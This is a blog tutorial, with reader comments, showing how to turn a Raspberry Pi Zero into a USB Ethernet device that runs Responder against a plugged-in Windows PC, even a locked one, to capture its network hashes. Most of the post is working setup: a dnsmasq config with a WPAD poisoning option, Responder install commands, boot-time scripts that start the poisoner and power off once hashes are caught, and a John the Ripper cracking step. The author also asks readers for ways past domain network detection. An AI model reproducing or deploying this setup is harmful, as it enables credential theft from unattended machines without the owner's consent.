Skip to main content

Snagging creds with Raspberry Pi Zero and Responder

So this is not all my own original work. This is a bringing together of the ethernet gadget tutorial by lady ada at adafruit and the beautiful work by Mubix at room362 which uses Laurent Gaffie's from SpiderLabs responder.py scripts.

I'm still using Mubix's recipe of USB Ethernet + DHCP + Responder == Creds but here we are using a £4.00 Raspberry Pi Zero instead of the USB armoury or the HAK5 LAN turtle. Both are awesome products.

Please note that this only works on the RPi Zero. Other RPi's will not work!
 

1.0 Setup the the RPi Zero for Ethernet over USB


Download and install the latest Jessie Lite from here onto an SD Card.

Pop the card out of the card reader and re-insert it to mount it. Take your favorite text editor and edit the following two files in the boot partition.

config.txt

Go to the bottom and add dtoverlay=dwc2 as the last line:



Save the config.txt file.

cmdline.txt

After rootwait (the last word on the first line) add a space and then modules-load=dwc2,g_ether


Save the cmdline.txt file.

Eject the SD card and pop it in your RPi Zero.

Your RPi is now setup to be recognized as an Ethernet over USB device, but we have unconfigured network interfaces at both ends so you probably wont be able to do much with it just yet.

Let's boot up the RPi Zero and connect it to the internet to install a DHCP server and grab the responder scripts while we are at it.

2.0 Preparing the RPi for Attack


For this section I connected my RPi to my ethernet switch using the OTG cable and a USB to ethernet converter and sshed to it. You could use a wireless dongle.



I'm not using the newly created usb0 interface until we are ready to deploy.

Sure you could share the internet from your PC with the RPi over your newly created USB0 interface, but thats a whole load of configuration with routes and iptables that we would then need to undo when we want to deploy the RPi.

2.1 Installing DHCP service

We are going to create a static ip address on usb0 and install dnsmasq as our dhcp server.

Create a static config for usb0



Using your favorite linux editor edit /etc/network/interfaces

sudo vi /etc/network/interfaces

Find the USB0 section or create it to match the following

allow-hotplug usb0
iface usb0 inet static
        address 192.168.200.1
        netmask 255.255.255.0
 


Of course you can configure whatever ip address and network you want in here, just make sure that it is consistent with the details that you configure in the DHCP server.

Install dnsmasq


We are using dnsmasq as our DHCP server which we will also use to point clients to the responder.py for poisoning.

sudo apt-get install dnsmasq

Edit /etc/dnsmasq.conf

Throwaway the default configuration and use the following:

interface=usb0
dhcp-range=192.168.200.2,192.168.200.254,255.255.255.0,1h

dhcp-authoritative

dhcp-option=252,http://192.168.200.1/wpad.dat

log-queries
log-dhcp

port=0

Note that the IP addresses have to be consistent with the static IP address you configured on the usb0 interface. Importantly for the wpad.dat attack to work is the dhcp-option 252 which points at the IP address of the Pi to allow the responder script to attack it.

Also notice that port=0 configures dnsmasq to not be a DNS server as we want responder to be the poisonous DNS server.

2.2 Installing Responder

The following download responder.py and install the necessary dependencies

sudo su -
apt-get install -y python git python-pip python-dev screen sqlite3 inotify-tools
pip install pycrypto
git clone https://github.com/spiderlabs/responder


The responder script currently detects if the responder.db file exists and creates it if not, if responder.db is an empty file it doesn't create the tables. The easiest way to deal with this is to delete the file /root/responder/Responder.db and allow the script recreate it correctly.

rm /root/responder/Responder.db

2.3 Putting it all together



To get responder to startup when the the RPi boots and shutdown once crds have been obtained, add the following to /etc/rc.local


# Start Responder
/usr/bin/screen -dmS responder bash -c 'cd /root/responder/; python Responder.py -I usb0 -f -w -r -d -F'

# Shutdown once creds have been obtained
/usr/bin/screen -dmS notify bash -c 'while inotifywait -e modify /root/responder/Responder.db; do shutdown -h now; done'

exit 0

The inotify checks to see if the Responder.db has been updated and shutsdown the Pi. Because we are letting responder create the Responder.db file this won't work the first time we deploy the RPi.

To see what the commands are doing you can use screen to watch what is going on:

screen -r responder

NBT Name Service/LLMNR Answerer 1.0.
Please send bugs/comments to: [email protected]
To kill this script hit CRTL-C

[+]NBT-NS & LLMNR responder started
Global Parameters set:
Challenge set is: 1122334455667788
WPAD Proxy Server is:ON
HTTP Server is:ON
HTTPS Server is:ON
SMB Server is:ON
SMB LM support is set to:0
SQL Server is:ON
FTP Server is:ON
DNS Server is:ON
LDAP Server is:ON
FingerPrint Module is:OFF


You can manually check the contents of the sqlite database with the command:

sqlite3 /root/responder/Responder.db 'select * from responder'

However the log files under /root/responder/logs contain a file that is perfectly formatted for cracking with John the Ripper Jumbo.

./john logfile.txt

This will take some time...

3.0 Deploying the RPi Zero


Just plug the RPi Zero into the target machine using a standard micro usb cable in the usb connection. No power is needed. The RPi is powered via the usb port like so:



Give the RPi about 20 seconds to boot up, then wait. If you watch the screen on the target windows PC you will see the Ethernet gadget install and then within about 10 seconds you will see the PC trying to configure the proxy. All being well the RPi should detect the update to Responder.db and shut itself down. Unplug the RPi.

[ VIDEO ]

This will work regardless of whether the screen is locked or not allowing us to snag the network hashes.

On domained PCs windows NLA may kick in detecting a new network and stopping the wpad.dat attack from working, however leaving the RPi plugged in for a short while will provide a wealth of details about the network for further analysis.



I've had pretty good success with this on various windows machines, however I've found that this doesn't work well on VMs, perhaps something to do with the Ethernet gadget drivers.

I'm also looking for better ways to target domained up PCs to stop the network detection kicking in and preventing this from working. Let me know if you have any ideas!

Comments

  1. Hi, is this solution still working (on your side)? I was not able to get any Responder.db or any DB entries. I tried the old Responder version (from here) as well as the new one: https://github.com/lgandx/Responder

    I also tried this how-to: http://elevatedprompt.com/2016/09/snagging-credentials-from-locked-machines-with-raspberry-pi-zero/#comment-285

    Cheers
    Andre

    ReplyDelete
    Replies
    1. Absolutely it is still working. Have you tried running it on an unlocked machine to see what the machine does?

      Delete
  2. Hi, I want to make this run in Raspberry Pi 3. Do you think it is possible ?
    If possible, what you think I need to change in this tutorial ?

    Cheers
    Cris

    ReplyDelete

Post a Comment

Popular posts from this blog

Munging Passwords

Password munging is the art of changing a word that is easy to remember until it becomes a strong password. This is how most people make up passwords.

Munge stands for Modify Until Not Guessed Easily.

The trouble is that it doesn't work very well. We can guess the modifications.
Password selection.
Take the average office worker that is told that it's time to change their password and come up with a new one. They have just been on holiday to New York with their family and so following common advice they choose that as their password.

newyork

No! They are told they must include capital letters

NewYork

No! They are told they must include numbers

N3wY0rk

No! They are told they must include a special character

N3wY0rk!

There, now that's a password that meets security requirements and our office worker can get on with their actual job instead of playing with passwords.

Scripting similar munges
There are a number of ways that they could munge their password but the vast majority ar…

Cracking PIN Numbers

Cracking PIN numbers PIN numbers are vulnerable to the same weaknesses as other passwords; people can choose them. Many applications and phones rely on PIN numbers for locking access to devices. If a PIN is good enough to protect your bank card, then it's probably safe enough to protect your phone right?

But phones tend to be much more lenient than banks when it comes to getting your PIN wrong. Fruit based devices and Android devices all let you try 10 PIN codes before wiping the device. How much extra leverage does that give an attacker? What if they have access to multiple devices and bank cards?
Most common three PIN numbers Data from a recent (2014) breach gives us some answers. The most common PIN number in this set is 0000(5.25%) closely followed by 1234 (4.15%) and 1111(2.89%). These three PIN numbers make up over 12% of the data. If you only had three tries (read bank card at an ATM) these are the numbers to try.

A recent report by McAffee values your credit card and PIN …